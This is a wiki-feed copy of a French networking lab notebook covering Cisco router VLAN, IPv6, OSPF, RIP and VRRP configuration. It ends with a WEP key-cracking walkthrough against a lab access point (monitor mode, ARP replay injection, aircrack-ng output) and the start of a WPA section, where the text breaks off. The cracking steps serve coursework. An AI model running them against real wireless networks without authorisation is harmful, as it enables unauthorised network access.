	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B05&amp;diff=35251</id>
		<title>Cahier 2016 groupe n°5</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B05&amp;diff=35251"/>
				<updated>2016-11-18T07:54:21Z</updated>
		
		<summary type="html">&lt;p&gt;Troj : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Cahier des charges ==&lt;br /&gt;
=== Présentation du travail ===&lt;br /&gt;
&lt;br /&gt;
==== Répartition du travail ====&lt;br /&gt;
&lt;br /&gt;
 {| class=&amp;quot;wikitable alternance centre&amp;quot;&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 1 (03/10)&lt;br /&gt;
 | Recherche sur le routeur 4331. Installation de la machine virtuelle, définition de l'architecture réseau. &lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 2 (10/10)&lt;br /&gt;
 | Création des VLAN - Bridge&lt;br /&gt;
 |- &lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 3 (13/10)&lt;br /&gt;
 | Création des VLAN - Bridge&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 4 (24/10)&lt;br /&gt;
 | Test de la configuration locale&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 5 (07/11)&lt;br /&gt;
 | Configuration OSPF - Configuration locale IPv6 - Configuration RIP - Configuration VRRP - Cassage de clé WEP&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 6 (17/11 - additionnel)&lt;br /&gt;
 | Protocole HSRP - Cassage de clé WPA - Configuration DNS - Securisation de site par SSL - Securisation de DNS par DNSSEC - LVM/RAID5&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 7 (28/11)&lt;br /&gt;
 | &lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 8 (12/12)&lt;br /&gt;
 | &lt;br /&gt;
 |-&lt;br /&gt;
 |}&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 1ère semaine ====&lt;br /&gt;
&lt;br /&gt;
Pour cette première séance nous avons d'abord installé la machine virtuelle Xen grâce à la commande :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
xen-create-image --hostname=Flash --ip=193.48.57.165 --netmask=255.255.255.240 gateway=193.48.57.171 &lt;br /&gt;
--dir=/usr/local/xen --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie --passwd&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nous obtenons ce résultat:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Installation Summary&lt;br /&gt;
---------------------&lt;br /&gt;
Hostname        :  Flash&lt;br /&gt;
Distribution    :  jessie&lt;br /&gt;
MAC Address     :  00:16:3E:49:8F:E5&lt;br /&gt;
IP Address(es)  :  193.48.57.165 &lt;br /&gt;
RSA Fingerprint :  5c:89:1c:49:cf:d1:a0:a3:9b:ff:0c:d1:f7:33:82:db&lt;br /&gt;
Root Password   :  N/A&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Travail réalisé la 2e semaine (2 séances) ====&lt;br /&gt;
Durant cette semaine, nous avons réalisés la configuration locale du routeur (configuration des VLANs). &amp;lt;br /&amp;gt;&lt;br /&gt;
Comme le 4331 est une nouvelle génération de routeur encore non utilisée en TP de PRA, nous devons apprendre comment l'utiliser.&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Configuration générale=====&lt;br /&gt;
Communication: '''Série 9800 Bauds 8 bits sans parité sans contrôle de flux'''.&amp;lt;br /&amp;gt;&lt;br /&gt;
Lors de sa première mise en route, nous devons effectuer sa configuration générale :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; hostname cisco config hostname&lt;br /&gt;
 enable secret reverse &amp;lt;/pre&amp;gt;&lt;br /&gt;
Puis ensuite, nous pouvons passer à la configuration des VALNs.&lt;br /&gt;
=====Configuration des VLANs =====&lt;br /&gt;
Nous avons 12 VLANs à configurer :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 11 VLANs (2-11) : VLAN correspondant aux différents groupes.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 1 VLAN (12) : VLAN des Machines virtuelles. Permet la communication entre Cordouan et les Commutateurs&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 1 VLAN (13) : VLAN d'interconnexion. Permet la communication entre le routeur local et le routeur de l'école&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&lt;br /&gt;
Sur l'interface physique du 4331, il y a 3 interfaces:&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/0 : disponible en cuivre et en fibre&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/1: disponible en cuivre&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/2: disponible en fibre&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous devons connecter notre routeur aux 2 commutateurs 6006 prévus dans l'architecture du TP. Pour cela, il faut que les 2 commutateurs aient les mêmes informations. Pour cela, nous devons créer des '''bridge-domain'''. Des bridge-domain permettent de rassembler 2 sous interfaces de 2 interfaces différentes pour qu'elles aient la même IP. L'interface principale n'aura pas d'adresse IP, les sous interfaces non plus, l'adresse IP sera placé sur le bridge-domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
Exemple: '''VLAN2 : Gi 0/0/0.2 et Gi 0/0/1.2 seront dans le même bridge-domain 2'''&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Les 4331 étant une nouvelle génération de routeur encore non testée à l'école, il fallait apprendre à s'en servir.&amp;lt;br /&amp;gt;&lt;br /&gt;
La plupart des commandes CISCO de base restent inchangées. Cependant, la création des sous interfaces a changée. Avant, nous devions créer des interfaces comme suit:&lt;br /&gt;
&amp;lt;pre&amp;gt; interface GigabitEthernet 0/0/0.X &amp;lt;/pre&amp;gt;&lt;br /&gt;
Avec le nouvel IOS (IOS ISR), nous ne pouvons pas créer des sous interfaces comme ci-dessus dans le but de les mettre dans un bridge.&lt;br /&gt;
Nous devons passer par une nouvelle commande qui s'appelle '''service instance''' :&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi 0/0/0&lt;br /&gt;
 service instance &amp;lt;n°VLAN&amp;gt; ethernet &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nous avons la sous interface numéro 2 de l'interface principale 0/0/0.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons alors créer nous sous interfaces:&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi0/0/0&lt;br /&gt;
  no ip address&lt;br /&gt;
  negociation auto&lt;br /&gt;
  service instance 2 ethernet&lt;br /&gt;
    encapsulation dot1q 2&lt;br /&gt;
    bridge-domain 2&lt;br /&gt;
&lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
    encapsulation dot1q 3&lt;br /&gt;
    bridge-domain 3&lt;br /&gt;
...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negociation auto&lt;br /&gt;
  service instance 2 ethernet&lt;br /&gt;
    encapsulation dot1q 2&lt;br /&gt;
    bridge-domain 2&lt;br /&gt;
...&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nos sous interfaces sont crées et sont placés dans les différents bridge domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Configuration des bridge-domain=====&lt;br /&gt;
Afin d'allouer des IP aux différents bridge domain, il faut prévenir le routeur que nous utilisons des bridge-domain:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; bridge irb &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite, nous devons préciser quel protocole nous devons utiliser et si les adresses IP des bridge domain seront des adresses routées :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; bridge 2 protocol ieee&lt;br /&gt;
 bridge 2 route ip&amp;lt;/pre&amp;gt;&lt;br /&gt;
Enfin, nous pouvons allouer des IP aux différents bridge domain :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;int BDI2&lt;br /&gt;
  ip address 10.60.2.1 255.255.255.0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Et nous répétons ces opérations pour tous les bridge-domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
Afin de tester si notre configuration locale est correcte, nous devons racker notre routeur, le connecter à un des 6006, puis connecter le 6006 à Cordouan (groupe BONDING). Ainsi, nous pourrons voir si nous pouvons ping notre routeur depuis notre VM.&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 3e semaine====&lt;br /&gt;
=====Test 1=====&lt;br /&gt;
Cette semaine, nous avons testés la configuration locale de notre routeur. Nous avons donc tentés de ping le routeur depuis notre VM. &amp;lt;br /&amp;gt;&lt;br /&gt;
Pour tester, nous avons besoin d'un port disponible sur CORDOUAN qui est dans le bridge IMA5sc.&amp;lt;br /&amp;gt;&lt;br /&gt;
Après des essais laborieux, nous décidons donc de regarder les adresses MAC des ports afin de les rassembler. Si 4 ports ont le même radical MAC, c'est qu'ils font partis d'un groupe de 4. Nous avons donc choisis '''eth4'''.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, il fallait trouver le port physique correspondant a eth4. '''Grâce au fichier /etc/udev/rules.d/70-persistence-net.rules''', on peut voir l'association du port physique à l'interface. Voici l'extrait qui nous intéresse: &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;# PCI device 0x14e4:0x1657 (tg3)&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:40&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth4&amp;quot;&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:41&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth5&amp;quot;&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:42&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth6&amp;quot;&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:43&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth7&amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
On voit bien que eth4 est dans un groupe de 4 ports, ce qui restreint nos choix. Ensuite, on sait que c'est le plus petit des 4 interfaces. Logiquement, ce sera le 1er du groupe.&amp;lt;br /&amp;gt;&lt;br /&gt;
On connecte donc ce port au commutateur sur un port qui appartient au VLAN des VM. On connecte ensuite notre routeur au commutateur via un port trunk.&amp;lt;br /&amp;gt;&lt;br /&gt;
'''Premier essai: FAIL'''&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Test 2=====&lt;br /&gt;
Et là, c'est le drame ... On ne ping rien ...&amp;lt;br /&amp;gt;&lt;br /&gt;
On se demande donc d'où cela peut venir.&amp;lt;br /&amp;gt;&lt;br /&gt;
======Première cause possible : La configuration de CORDOUAN======&lt;br /&gt;
Peut-être que c'est CORDOUAN qui est mal configuré. On se place donc sur CORDOUAN, et grâce à la commande '''cdpr''' (Cisco Discovery Protocol Reporter), on peut demander au serveur de chercher ses voisins et d'avoir la configuration de la liaison avec ce voisin. Voici le résultat de cette commande:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;cdpr -d eth4&lt;br /&gt;
cdpr - Cisco Discovery Protocol Reporter&lt;br /&gt;
Version 2.4&lt;br /&gt;
Copyright (c) 2002-2010 - MonkeyMental.com&lt;br /&gt;
&lt;br /&gt;
Using Device: eth4&lt;br /&gt;
Warning opening device (eth4: no IPv4 address assigned)&lt;br /&gt;
Waiting for CDP advertisement:&lt;br /&gt;
(default config is to transmit CDP packets every 60 seconds)&lt;br /&gt;
Device ID&lt;br /&gt;
  value:  Switch_E306&lt;br /&gt;
Addresses&lt;br /&gt;
Port ID&lt;br /&gt;
  value:  GigabitEthernet4/13&amp;lt;/pre&amp;gt;&lt;br /&gt;
On voit bien que CORDOUAN détecte qu'il a une liaison avec le switch qui se trouve en E306 et qu'il est connecté via le port Gi4/13.&amp;lt;br /&amp;gt;&lt;br /&gt;
======Deuxième cause possible: Le commutateur======&lt;br /&gt;
Peut-être donc que c'est le commutateur qui est mal configuré. On se place donc sur le commutateur, et toujours grâce à la commande '''cdpr''', on peut demander au commutateur de trouver ses voisins. Le résultat de cette commande est la suivante: Le commutateur découvre bien notre routeur (cisco), et sait qu'il est connecté sur le port 4/47 (port trunk).&lt;br /&gt;
======Dernière cause possible:Le routeur======&lt;br /&gt;
On se dit donc que le problème vient du routeur...&amp;lt;br /&amp;gt;&lt;br /&gt;
On regarde donc la configuration du routeur, et Mr REDON nous demande pourquoi on n'a pas créé de VLAN. Les VLAN sont traduits par les service instance dans le nouvel IOS, mais peut-être que nous devons encore définir que les paquets venant/sortant de l'interface générale doivent être encapsulé/décapsulé en DOT1Q.&amp;lt;br /&amp;gt;&lt;br /&gt;
Après quelques recherches, une première solution a été de préciser sur l'interface des bridge-domain que les paquets étaient encapsulés en DOT1Q. Solution '''peu logique''' vu que l'encapsulation est déjà faite dans les service instance.&amp;lt;br /&amp;gt;&lt;br /&gt;
Après encore quelques recherches, une solution plausible est que '''le routeur ne sait pas qu'il faut dé-encapsuler les paquets venant d'un VLAN'''. Théoriquement, il n'enlèverait pas le tag associé à l'encapsulation DOT1Q.&amp;lt;br /&amp;gt;&lt;br /&gt;
Une commande cisco à associer à TOUTES les interfaces service instance permet de préciser qu'il faut supprimer le tag associé à l'encapsulation:&lt;br /&gt;
&amp;lt;pre&amp;gt;rewrite ingress tag pop 1 symmetric&amp;lt;/pre&amp;gt;&lt;br /&gt;
Une fois cette commande appliquée à tous les services, nous pouvons effectuer un test préalable : '''Nous connectons un eeePC au commutateur via un port associé au VLAN des VM. L'eeePC serait muni d'une IP dans le réseau des VM.'''&amp;lt;br /&amp;gt;&lt;br /&gt;
Résultat '''OK'''&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons donc tenter de ping le routeur depuis la machine virtuelle :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;ping 193.48.57.171&lt;br /&gt;
PING 193.48.57.171 (193.48.57.171) 56(84) bytes of data.&lt;br /&gt;
64 bytes from 193.48.57.171: icmp_seq=1 ttl=255 time=0.360 ms&lt;br /&gt;
64 bytes from 193.48.57.171: icmp_seq=2 ttl=255 time=0.271 ms&lt;br /&gt;
^C&lt;br /&gt;
--- 193.48.57.171 ping statistics ---&lt;br /&gt;
2 packets transmitted, 2 received, 0% packet loss, time 999ms&lt;br /&gt;
rtt min/avg/max/mdev = 0.271/0.315/0.360/0.047 ms&amp;lt;/pre&amp;gt;&lt;br /&gt;
Notre configuration locale est donc maintenant achevée. Nous pouvons passer à la configuration de l'interconnexion ipv4 et ipv6 de l'école.&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 4e semaine====&lt;br /&gt;
=====Configuration IPv6=====&lt;br /&gt;
Nous avons donc pu commencer la configuration IPv6 de notre routeur.&amp;lt;br /&amp;gt;&lt;br /&gt;
Chaque bridge-domain aura son adresse IP dans le réseau IPv6 de l'école, avec un préfixe débutant à 2001:660:4401:60b0::/64.&amp;lt;br /&amp;gt;&lt;br /&gt;
La configuration est la suivante, pour chaque BDI:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;cisco(config)#int BDI6                                                          &lt;br /&gt;
cisco(config-if)#ipv6 address 2001:660:4401:60b4::/64 eui-64                    &lt;br /&gt;
cisco(config-if)#ipv6 nd prefix 2001:660:4401:60b4::/64 1000 900                &lt;br /&gt;
cisco(config-if)#ipv6 nd router-preference high                                 &lt;br /&gt;
cisco(config-if)#ipv6 enable&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Configuration OSPF (IPv4)=====&lt;br /&gt;
Dès notre arrivée, Mr.REDON nous a dit que, pour booster le TP, il avait effectué lui-même la configuration OSPF de notre routeur. La voici:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;router ospf 1&lt;br /&gt;
 router-id 10.60.2.1&lt;br /&gt;
 summary-address 10.60.0.0 255.255.0.0&lt;br /&gt;
 summary-address 193.48.57.160 255.255.255.240&lt;br /&gt;
 redistribute connected metric 30 subnets&lt;br /&gt;
 network 192.168.222.0 0.0.0.7 area 1&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Configuration RIP (IPv6)=====&lt;br /&gt;
Le protocole RIPv6 est une stratégie de routage pour IPv6. Ce protocole est configuré pour le BDI130 (correspondant au VLAN130 d'interconnexion des routeurs de l'école). La configuration de RIP est la suivante:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;ipv6 router rip tpima5sc&lt;br /&gt;
 redistribute connected metric 1&lt;br /&gt;
 redistribute static metric 1&lt;br /&gt;
 redistribute rip 1 metric 1&amp;lt;/pre&amp;gt;&lt;br /&gt;
La prise en compte du protocole RIP dans la BDI130 est la suivante:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;interface BDI130&lt;br /&gt;
 ip address 192.168.222.1 255.255.255.248&lt;br /&gt;
 ipv6 address 2001:660:4401:60AA::/64 eui-64&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60AA::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 ipv6 rip tpima5sc enable&amp;lt;/pre&amp;gt;&lt;br /&gt;
Pour confirmer notre résultat, nous regardons la table de routage IPv6:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; cisco#sh ipv6 route&lt;br /&gt;
IPv6 Routing Table - default - 65 entries&lt;br /&gt;
Codes: C - Connected, L - Local, S - Static, U - Per-user Static route&lt;br /&gt;
       B - BGP, R - RIP, I1 - ISIS L1, I2 - ISIS L2&lt;br /&gt;
       IA - ISIS interarea, IS - ISIS summary, D - EIGRP, EX - EIGRP external&lt;br /&gt;
       ND - ND Default, NDp - ND Prefix, DCE - Destination, NDr - Redirect&lt;br /&gt;
       O - OSPF Intra, OI - OSPF Inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2&lt;br /&gt;
       ON1 - OSPF NSSA ext 1, ON2 - OSPF NSSA ext 2, a - Application&lt;br /&gt;
R   ::/0 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:60::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6000::/56 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6002::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6003::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6004::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6005::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6006::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&amp;lt;/pre&amp;gt;&lt;br /&gt;
Notre routeur détecte les routeurs de l'école, notre configuration est donc achevée.&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Configuration VRRP=====&lt;br /&gt;
Le VRRP est un protocole de redondance. Une adresse IP virtuelle (IP flottante) est montée sur 1 des 2 routeurs. Si le routeur sur laquelle est montée l'IP flottante tombe, l'IP est montée sur l'autre routeur. De plus, les machines pourront envoyer les paquets vers l'adresse IP virtuelle, et le VRRP dispatchera les paquets entre les 2 routeurs.&amp;lt;br /&amp;gt;&lt;br /&gt;
Voici la configuration VRRP de notre routeur:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;interface BDI2&lt;br /&gt;
 ip address 10.60.2.1 255.255.255.0&lt;br /&gt;
 ipv6 address 2001:660:4401:60B0::/64 eui-64&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60B0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 vrrp 1 ip 10.60.2.3&lt;br /&gt;
 vrrp 1 priority 110&amp;lt;/pre&amp;gt;&lt;br /&gt;
10.60.X.1 est l'espace des adresses IP de notre routeur (4331), 10.60.X.2 est l'espace des adresses IP du routeur 3560E, donc 10.60.X.3 est l'espace des adresses IP flottantes, X représente le numéro du BDI.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons voir si notre configuration VRRP est effective : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;cisco#sh vrrp&lt;br /&gt;
BDI12 - Group 1  &lt;br /&gt;
  State is Master&lt;br /&gt;
  Virtual IP address is 193.48.57.173&lt;br /&gt;
  Virtual MAC address is 0000.5e00.0101&lt;br /&gt;
  Advertisement interval is 1.000 sec&lt;br /&gt;
  Preemption enabled&lt;br /&gt;
  Priority is 110 &lt;br /&gt;
  Master Router is 193.48.57.171 (local), priority is 110 &lt;br /&gt;
  Master Advertisement interval is 1.000 sec&lt;br /&gt;
  Master Down interval is 3.570 sec&lt;br /&gt;
&lt;br /&gt;
BDI2 - Group 1  &lt;br /&gt;
  State is Master&lt;br /&gt;
  Virtual IP address is 10.60.2.3&lt;br /&gt;
  Virtual MAC address is 0000.5e00.0101&lt;br /&gt;
  Advertisement interval is 1.000 sec&lt;br /&gt;
  Preemption enabled&lt;br /&gt;
  Priority is 110 &lt;br /&gt;
  Master Router is 10.60.2.1 (local), priority is 110 &lt;br /&gt;
  Master Advertisement interval is 1.000 sec&lt;br /&gt;
  Master Down interval is 3.570 sec&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Cependant, même si notre configuration VRRP est bonne, nous n'arrivons pas à ping 193.48.57.173, qui représente l'adresse IP virtuelle montée sur le bridge-domain des VM.&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Craquage de clé WEP=====&lt;br /&gt;
On bascule d’abord la carte en mode monitor : &lt;br /&gt;
&amp;lt;pre&amp;gt; airmon-ng start xxxxxxxx  &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite on scan tous les réseaux wifi captés par cette même carte :&lt;br /&gt;
&amp;lt;pre&amp;gt; airodump-ng –encrypt wep wlan 0 &amp;lt;/pre&amp;gt;&lt;br /&gt;
On obtient :&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
 CH 13 ][ Elapsed: 4 s ][ 2016-03-08 10:32                                         &lt;br /&gt;
                                                                                                                  &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                  &lt;br /&gt;
 44:AD:D9:5F:87:00  -44        2        0    0  11  54e. WEP  WEP         Wolverine                               &lt;br /&gt;
 04:DA:D2:9C:50:53  -66        2        0    0  13  54e. WEP  WEP         cracotte04                              &lt;br /&gt;
 04:DA:D2:9C:50:55  -70        2       91   35  13  54e. WEP  WEP         cracotte06                              &lt;br /&gt;
 04:DA:D2:9C:50:51  -69        4       33   13  13  54e. WEP  WEP         cracotte02                              &lt;br /&gt;
 04:DA:D2:9C:50:57  -67        3       44   19  13  54e. WEP  WEP         cracotte08                              &lt;br /&gt;
 04:DA:D2:9C:50:56  -69        2       38   11  13  54e. WEP  WEP         cracotte07                              &lt;br /&gt;
 04:DA:D2:9C:50:54  -68        2       37   14  13  54e. WEP  WEP         cracotte05                              &lt;br /&gt;
 04:DA:D2:9C:50:58  -70        2      175   70  13  54e. WEP  WEP         cracotte09                              &lt;br /&gt;
 04:DA:D2:9C:50:50  -68        0      142   52  13  -1   WEP  WEP         &amp;lt;length:  0&amp;gt;                            &lt;br /&gt;
 04:DA:D2:9C:50:52  -70        2      171   64  13  54e. WEP  WEP         cracotte03                              &lt;br /&gt;
                                                                                                                  &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                         &lt;br /&gt;
                                                                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:55  00:0F:B5:92:23:6B  -66    0 - 9e  1160       50                                                &lt;br /&gt;
 04:DA:D2:9C:50:51  00:0F:B5:92:24:51  -62    0 -48e    34        7                                                &lt;br /&gt;
 04:DA:D2:9C:50:57  00:0F:B5:92:22:66  -64    0 - 6e    31        6                                                &lt;br /&gt;
 04:DA:D2:9C:50:56  00:0F:B5:92:23:71  -66    0 -48e    60        6                                                &lt;br /&gt;
 04:DA:D2:9C:50:54  00:0F:B5:92:23:74  -70    0 -24e    52       11                                                &lt;br /&gt;
 04:DA:D2:9C:50:58  00:0F:B5:92:23:69  -62    0 -48e    12      140  &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ici nous avons choisi cracotte06 comme wifi cible. On récupère donc son BSSID : 04 :DA :D2 :9C :50 :55 sur le channel 13&amp;lt;br /&amp;gt;&lt;br /&gt;
On surveille uniquement notre cible pour s'assurer qu'une machine s'y connecte bien :&lt;br /&gt;
&amp;lt;pre&amp;gt; airodump-ng –w out –c 13 –bssid 04 :DA :D2 :9C :50 :55 wlan0 &amp;lt;/pre&amp;gt; &amp;lt;br /&amp;gt;&lt;br /&gt;
Pour le craquage, il faut au préalable surchargé de requête ARP le réseau cible pour récupérer un maximum de trame d’échanges.&lt;br /&gt;
&amp;lt;pre&amp;gt; aireplay-ng -3 –e cracotte06 –a 04 :DA :D2 :9C :50 :55 –b 04 :DA :D2 :9C :50 :55 –h 00:0F:B5:92:23:6B –x 1000 –n out-ox.cap wlan0 &amp;lt;/pre&amp;gt;&lt;br /&gt;
Une fois un nombre de trame récupéré assez conséquent, on lance l’utilitaire : &amp;lt;pre&amp;gt;aircarck-ng out_ox.cap&amp;lt;/pre&amp;gt; avec out_ox.cap le fichier de sauvegarde contenant toutes les trames ARP récupérées. &lt;br /&gt;
&lt;br /&gt;
On a alors réussi notre craquage au bout de quelque minutes :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
  Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                 [00:00:01] Tested 785 keys (got 1349085 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  2   EE(1862400) 75(1396736) DB(1392128) FF(1388544) 50(1387520) &lt;br /&gt;
    1    1/  4   DD(1419264) 1B(1397504) 2C(1392128) 54(1387776) 26(1385728) &lt;br /&gt;
    2   47/  2   DB(1365760) 38(1364736) 00(1364480) 22(1364480) 82(1364480) &lt;br /&gt;
    3    1/  2   26(1407488) 2C(1390592) 65(1387520) F0(1387520) FE(1387520) &lt;br /&gt;
    4    4/  4   F6(1383168) CD(1382656) 7E(1381376) F0(1380096) 58(1379840) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44:44 ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 5ème semaine ====&lt;br /&gt;
=====Craquage clé WPA =====&lt;br /&gt;
&lt;br /&gt;
Pour ce craquage, nous avons gardé la même cible, c'est à dire cracotte06. Il faut encore ici s'assurer qu'une machine est connecté à cette borne.&lt;br /&gt;
Pour le craquage WPA, il nous faut 2 éléments : &amp;lt;br /&amp;gt;&lt;br /&gt;
